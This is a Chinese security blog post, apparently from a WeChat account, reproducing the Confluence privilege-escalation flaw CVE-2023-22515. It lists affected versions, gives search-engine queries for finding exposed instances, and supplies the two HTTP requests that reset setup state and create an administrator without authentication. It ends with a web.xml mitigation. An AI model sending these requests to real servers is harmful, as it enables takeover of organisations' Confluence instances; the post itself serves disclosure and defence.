关注我们❤️,添加星标🌟,一起学安全!
作者:Locks_@Timeline Sec
本文字数:926
阅读时长:2~3min
声明:仅供学习参考使用,请勿用作违法用途,否则后果自负
0x01 简介
Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。
0x02 漏洞概述
漏洞编号:CVE-2023-22515
攻击者可以利用有访问权限的Confluence Data Center and Server实例漏洞在未授权的情况下创建Confluence管理员用户并以管理员权限进入Confluence后台。
0x03 影响版本
8.0.0 <= Confluence Data Center and Confluence Server <= 8.0.4
8.1.0 <= Confluence Data Center and Confluence Server <= 8.1.4
8.2.0 <= Confluence Data Center and Confluence Server <= 8.2.3
8.3.0 <= Confluence Data Center and Confluence Server <= 8.3.2
8.4.0 <= Confluence Data Center and Confluence Server <= 8.4.2
8.5.0 <= Confluence Data Center and Confluence Server <= 8.5.1
0x04 环境搭建
fofa:app="Atlassian-Confluence"
hunter:app.name="Confluence"
0x05 漏洞复现
漏洞URL:
http://localhost/login.action?logout=true
第一次发包:发送首次请求包为:
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
第二次发包:添加管理员账号
POST /setup/setupadministrator.action HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-Atlassian-Token: no-check
Content-Length: 122
Content-Type: application/x-www-form-urlencoded
username=newadmin1&fullName=newadmin1&[email protected]&password=newPassword1&confirm=newPassword1&setup-next-button=Next
凭借新添加的账号进行登录
利用思路:
1、利用 ParametersInterceptor 的属性覆盖绕过 /setup/* 路由的限制,访问 /setup/setupadministrator.action
添加管理员
2、找到能触发 ParametersInterceptor 的 action,然后覆盖 setupComplete 绕过 SetupCheckInterceptor 对 /setup/* 路由的限制,然后访问 /setup/setupadministrator.action
添加管理员。
0x06 修复方式
官方修复方案:
建议您更新当前系统或软件至最新版,完成漏洞的修复。
临时缓解方案:
1、修改 //confluence/WEB-INF/web.xml 文件,并添加以下内容(就在文件末尾的 标签之前):
<security-constraint>
<web-resource-collection>
<url-pattern>/setup/*</url-pattern>
<http-method-omission>*</http-method-omission>
</web-resource-collection>
<auth-constraint />
</security-constraint>
2、重新启动 Confluence
参考链接
https://mp.weixin.qq.com/s/99quAfbrwkXS40MqMUBY2w
推荐服务
历史漏洞
CVE-2019-3394
CVE-2019-3396
CVE-2019-3398
CVE-2021-26084
CVE-2022-26134
CVE-2022-26138
后台功能
回复【1】领取新人学习资料
回复【2】进入漏洞查询功能
回复【3】获取加群方式
回复【4】领取安全电子书籍
回复【5】进入SRC-QQ交流群
商务合作
原文始发于微信公众号(Timeline Sec):CVE-2023-22515:Confluence权限提升漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论